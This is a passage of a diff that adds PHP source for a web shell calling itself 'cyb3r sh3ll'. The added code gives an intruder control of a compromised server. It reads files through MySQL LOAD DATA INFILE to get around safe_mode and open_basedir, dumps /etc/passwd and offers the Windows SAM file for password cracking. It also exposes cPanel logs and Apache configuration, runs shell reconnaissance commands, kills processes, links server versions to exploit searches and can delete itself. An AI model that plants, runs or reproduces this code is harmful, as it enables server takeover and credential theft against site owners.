+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+
+    }
+
+    if ($sql_act == "serverstatus")
+
+    {
+
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+
+     echo "<center><b>Server-status variables:</b><br><br>";
+
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+
+     echo "</table></center>";
+
+     mysql_free_result($result);
+
+    }
+
+    if ($sql_act == "servervars")
+
+    {
+
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+
+     echo "<center><b>Server variables:</b><br><br>";
+
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+
+     echo "</table>";
+
+     mysql_free_result($result);
+
+    }
+
+    if ($sql_act == "processes")
+
+    {
+
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+
+     echo "<center><b>Processes:</b><br><br>";
+
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+
+     echo "</table>";
+
+     mysql_free_result($result);
+
+    }
+
+    if ($sql_act == "getfile")
+
+    {
+
+     $tmpdb = $sql_login."_tmpdb";
+
+     $select = mysql_select_db($tmpdb);
+
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+
+     if ($select)
+
+     {
+
+      $created = FALSE;
+
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+
+      $result = mysql_query("SELECT * FROM tmp_file;");
+
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+
+      else
+
+      {
+
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+
+       $f = "";
+
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+
+       mysql_free_result($result);
+
+       mysql_query("DROP TABLE tmp_file;");
+
+      }
+
+     }
+
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+
+    }
+
+   }
+
+  }
+
+ }
+
+ echo "</td></tr></table>";
+
+ if ($sql_sock)
+
+ {
+
+  $affected = @mysql_affected_rows($sql_sock);
+
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+
+ }
+
+ echo "</table>";
+
+}
+
+if ($act == "mkdir")
+{
+
+ if ($mkdir != $d)
+ {
+
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+
+  echo "<br><br>";
+
+ }
+
+ $act = $dspact = "ls";
+
+}
+
+if ($act == "d")
+
+{
+
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+
+ else
+
+ {
+
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+
+  if (!$win)
+
+  {
+
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+
+   $ow = posix_getpwuid(fileowner($d));
+
+   $gr = posix_getgrgid(filegroup($d));
+
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+
+  }
+
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+
+ }
+
+}
+
+
+if ($act == "security")
+{
+
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+
+ if (!$win)
+
+ {
+
+  if ($nixpasswd)
+
+  {
+
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+
+   echo "<b>*nix /etc/passwd:</b><br>";
+
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+
+   $i = $nixpwd_s;
+
+   while ($i < $nixpwd_e)
+
+   {
+
+    $uid = posix_getpwuid($i);
+
+    if ($uid)
+
+    {
+
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+
+     echo join(":",$uid)."<br>";
+
+    }
+
+    $i++;
+
+   }
+
+  }
+
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+
+ }
+
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+
+ displaysecinfo("RAM",myshellexec("free -m"));
+
+ displaysecinfo("HDD space",myshellexec("df -h"));
+
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+
+}
+
+if ($act == "mkfile")
+
+{
+ if ($mkfile != $d)
+
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+
+ }
+ else {$act = $dspact = "ls";}
+
+}
+
+if ($act == "encoder")
+
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+
+ echo "<center>base64_decode - ";
+
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+
+ else
+
+ {
+
+  $debase64 = base64_decode($encoder_input);
+
+  $debase64 = str_replace("\0","[0]",$debase64);
+
+  $a = explode("\r\n",$debase64);
+
+  $rows = count($a);
+
+  $debase64 = htmlspecialchars($debase64);
+
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+
+ }
+
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+
+ $c = strlen($encoder_input);
+
+ for($i=0;$i<$c;$i++)
+
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+
+ echo "\" readonly><br></center></form>";
+
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+
+ {
+
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); }
+
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+
+ }
+
+ else
+
+ {
+
+  if (!empty($rndcode)) {echo "<b>Error: Incorrect Confimation!</b>";}
+
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+
+ }
+
+}
+
+if ($act == "serverinfo")
+{
+
+global $windows,$disablefunctions,$safemode;
+$cwd= getcwd();
+$mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
+$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
+if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
+$osver=$tsize=$fsize='';
+if ($windows){ 
+$osver = "  (".shelL("ver").")";
+$sysroot = shelL("echo %systemroot%");
+if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
+if (empty($sysroot)) $sysroot = getenv("windir");
+if (empty($sysroot)) $sysroot = "Not Found";
+if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
+for ($i=66;$i<=90;$i++){
+$drive= chr($i).':\\';
+if (is_dir($drive)){
+$fsize+=@disk_free_space($drive);
+$tsize+=@disk_total_space($drive);
+}
+}
+}else{
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$disksize="Used Space: ". showsizE($tsize-$fsize) . "   Free Space: ". showsizE($fsize) . "   Total Space: ". showsizE($tsize);
+if (empty($CPU)) $CPU = "Unknown";
+$os = php_unamE();
+$osn=php_unamE('s');
+if(!$windows){ 
+$ker = php_unamE('r');
+$o=($osn=="Linux")?"Linux+Kernel":$osn;
+$os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);
+$os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);
+$inpa=':';
+}else{
+$sam = $sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);
+}
+$software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);
+echo "
+<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"  width=\"100%\" >
+ <tr><td><b>Server information:</b></td></tr>
+ <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>
+ <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];
+if (!empty($_SERVER["SERVER_ADDR"])){
+ echo "(". $_SERVER["SERVER_ADDR"] .")";}
+echo "
+</td></tr>
+<tr><td width=\"25%\" >Operation System:</td>    <td >$os$osver</td></tr>
+<tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td>  <td bgcolor=\"#666666\">$software</td></tr>
+<tr><td width=\"25%\" >CPU:</td>  <td >$CPU</td></tr>
+ <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>
+<tr><td width=\"25%\" >User domain:</td><td >";
+if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];
+else echo "Unknown"; 
+echo "
+</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>
+<td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();
+else echo "Unknown"; echo "</td></tr>";
+if ($windows){
+echo "
+<tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>
+<td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";
+if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">
+<font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";
+}
+else
+{
+echo "<tr><td width=\"25%\" >Passwd file:</td><td >";
+if (is_readable('/etc/passwd')) echo "
+<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
+if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";
+echo "</td></tr>";
+}
+$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
+echo "
+<tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>
+<td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a> 
+(<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>
+<tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>
+<td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";
+else echo "Not Found";echo "</td>
+<tr><td width=\"25%\" >Include path:</td>
+<td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>
+<tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>
+<td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";
+echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";
+if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>
+<tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>
+<tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>
+<tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>
+<td bgcolor=\"#666666\">";$sq="";
+if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";
+if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";
+if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";
+if(function_exists('sqlite_open')) $sq.= " SQLite ";
+if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";
+if(function_exists('msql_connect')) $sq.= " mSQL ";
+if(function_exists('mysqli_connect'))$sq.= " MySQLi ";
+if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";
+if ($sq=="") $sq= "Nothing"; 
+
+echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";
+if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";
+
+}
+
+if ($act == "clientinfo")
+{
+echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";
+}
+
+if ($act == "processes")
+
+{
+
+ echo "<b>Processes:</b><br>";
+
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+
+ else {$handler = "tasklist";}
+
+ $ret = myshellexec($handler);
+
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+
+ else
+
+ {
+
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+
+  $parsesort = parsesort($processes_sort);
+
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+
+  $k = $parsesort[0];
+
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+
+  $ret = htmlspecialchars($ret);
+
+  if (!$win)
+
+  {
+
+   if ($pid)
+
+   {
+
+    if (is_null($sig)) {$sig = 9;}
+
+    echo "Sending signal ".$sig." to #".$pid."... ";
+
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+
+    else {echo "ERROR.";}
+
+   }
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+
+   $stack = explode("\n",$ret);
+
+   $head = explode(" ",$stack[0]);
+
+   unset($stack[0]);
+
+   for($i=0;$i<count($head);$i++)
+
+   {
+
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+
+   }
+
+   $prcs = array();
+
+   foreach ($stack as $line)
+
+   {
+
+    if (!empty($line))
+
+{
+
+ echo "<tr>";
+
+     $line = explode(" ",$line);
+
+     $line[10] = join(" ",array_slice($line,10));
+
+     $line = array_slice($line,0,11);
+
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+
+     $prcs[] = $line;
+
+     echo "</tr>";
+
+    }
+
+   }
+
+  }
+
+  else
+
+  {
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+
+   $ret = convert_cyr_string($ret,"d","w");
+
+   $stack = explode("\n",$ret);
+
+   unset($stack[0],$stack[2]);
+
+   $stack = array_values($stack);
+
+   $head = explode("",$stack[0]);
+
+   $head[1] = explode(" ",$head[1]);
+
+   $head[1] = $head[1][0];
+
+   $stack = array_slice($stack,1);
+
+   unset($head[2]);
+
+   $head = array_values($head);
+
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+
+   if ($k > count($head)) {$k = count($head)-1;}
+
+   for($i=0;$i<count($head);$i++)
+
+   {
+
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+
+   }
+
+   $prcs = array();
+
+   foreach ($stack as $line)
+
+   {
+
+    if (!empty($line))
+
+    {
+
+     echo "<tr>";
+
+     $line = explode("",$line);
+
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+
+     $prcs[] = $line;
+
+     echo "</tr>";
+
+    }
+
+   }
+
+  }
+
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+
+  $v = $processes_sort[0];
+
+  usort($prcs,"tabsort");
+
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+
+  $tab = array();
+
+  $tab[] = $head;
+
+  $tab = array_merge($tab,$prcs);
+
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+
+  foreach($tab as $i=>$k)
+
+  {
+
+   echo "<tr>";
+
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+
+   echo "</tr>";
+
+  }
+
+  echo "</table>";
+
+ }
+
+}
+
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+
+  $list = array();
+
+  if ($h = @opendir($d))
+
+  {
+
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+
+   closedir($h);
+
+  }
+
+  else {}
+
+ }
+
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+
+  //Building array
+
+  $objects = array();
+
+  $vd = "f"; //Viewing mode
+
+  if ($vd == "f")
+
+  {
+
+   $objects["head"] = array();
+
+   $objects["folders"] = array();
+
+   $objects["links"] = array();
+
+   $objects["files"] = array();
+
+   foreach ($list as $v)
+
+   {
+
+    $o = basename($v);
+
+    $row = array();
+
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+
+    elseif (is_dir($v))
+
+    {
+
+     if (is_link($v)) {$type = "LINK";}
+
+     else {$type = "DIR";}
+
+     $row[] = $v;
+
+     $row[] = $type;
+
+    }
+
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+
+    $row[] = filemtime($v);
+
+    if (!$win)
+
+    {
+
+     $ow = posix_getpwuid(fileowner($v));
+
+     $gr = posix_getgrgid(filegroup($v));
+
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+
+    }
+
+    $row[] = fileperms($v);
+
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+
+    $i++;
+
+   }
+
+   $row = array();
+
+   $row[] = "<b>Name</b>";
+
+   $row[] = "<b>Size</b>";
+
+   $row[] = "<b>Modify</b>";
+
+   if (!$win)
+
+  {$row[] = "<b>Owner/Group</b>";}
+
+   $row[] = "<b>Perms</b>";
+
+   $row[] = "<b>Action</b>";
+
+   $parsesort = parsesort($sort);
+
+   $sort = $parsesort[0].$parsesort[1];
+
+   $k = $parsesort[0];
+
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+
